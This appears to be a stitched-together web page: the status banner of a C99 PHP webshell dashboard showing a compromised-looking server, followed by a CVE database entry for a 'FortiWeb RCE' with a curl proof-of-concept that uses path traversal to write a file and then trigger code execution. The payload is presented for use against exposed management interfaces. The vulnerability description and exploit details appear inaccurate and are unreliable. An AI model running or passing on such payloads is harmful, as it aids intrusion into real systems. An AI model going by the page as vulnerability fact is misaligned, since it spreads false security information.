C99SHELL DASHBOARDc99shell.tail7973d7.ts.net WebshellDBRoot 2026-08-03 08:15:11

!C99SHELL 2.0 [PHP 7 Update] [25.02.2019] !

Software: Apache/2.4.68 (Debian). PHP/8.2.33  

uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1
(2026-06-18) x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data)  

Safe-mode: OFF (not secure)

/var/www/html/   drwxrwxrwx
Free 115.58 GB of 452.4 GB (25.55%)



CVE DATABASEarchive & lookup of vulnerabilities
CVE CVE-2025-25257vulnerability detail
[← Back to CVE DB]
IdentifierCVE-2025-25257
SeverityCRITICAL
CVSS v39.8 / 10
NameFortiWeb RCE
AffectedFortiWeb <=7.6.0 / FortiOS SSL-VPN

Description

Path traversal in the FortiWeb login handler allows an unauthenticated attacker to reach the /clogin?callback= endpoint and overwrite arbitrary files, leading to remote code execution as the web user. Widely chained against exposed FortiGate/FortiWeb management interfaces.

PoC / Payload — CVE-2025-25257
curl -sk 'https://TARGET/clogin?callback=../../../../tmp/x' \n  -X POST -d 'html=<pre>id</pre>'\n# then trigger the written file to obtain RCE